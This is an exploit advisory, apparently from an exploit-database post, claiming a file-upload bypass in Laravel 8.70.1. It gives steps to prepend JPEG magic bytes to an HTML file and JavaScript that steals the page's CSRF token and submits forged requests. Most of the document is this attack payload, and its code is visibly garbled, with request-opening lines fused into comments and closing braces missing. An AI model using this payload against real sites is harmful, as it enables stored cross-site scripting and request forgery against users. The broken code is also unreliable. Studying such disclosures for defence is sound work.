Authored by Hosein Vita

PHP Laravel version 8.70.1 suffers from cross site scripting and cross site request forgery related vulnerabilities.

# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage:
# Software Link:
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux

# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server
# which let us run arbitary javascript and bypass the csrf token , For more information read this one

# Steps to reproduce:
1- Use HxD tool and add FF D8 FF E0 at the very begining of your file
2- Use code below to bypass csrf token

<title>Laravel Csrf Bypass</title>
function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();"POST", POST_URL, true);

// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
xhr.send("_token=" + token + "&desiredParameter=desiredValue");

function getTokenJS() {
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
// true on the end of here makes the call asynchronous
//Edit the path as you want"GET", "/image-upload", true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementsByTagName("input")[0];
// Show the token
alert("The token is: " + input.value);
// Use the token to submit the form
// Make the request

var POST_URL="/"


3- Save it as Html file and upload it.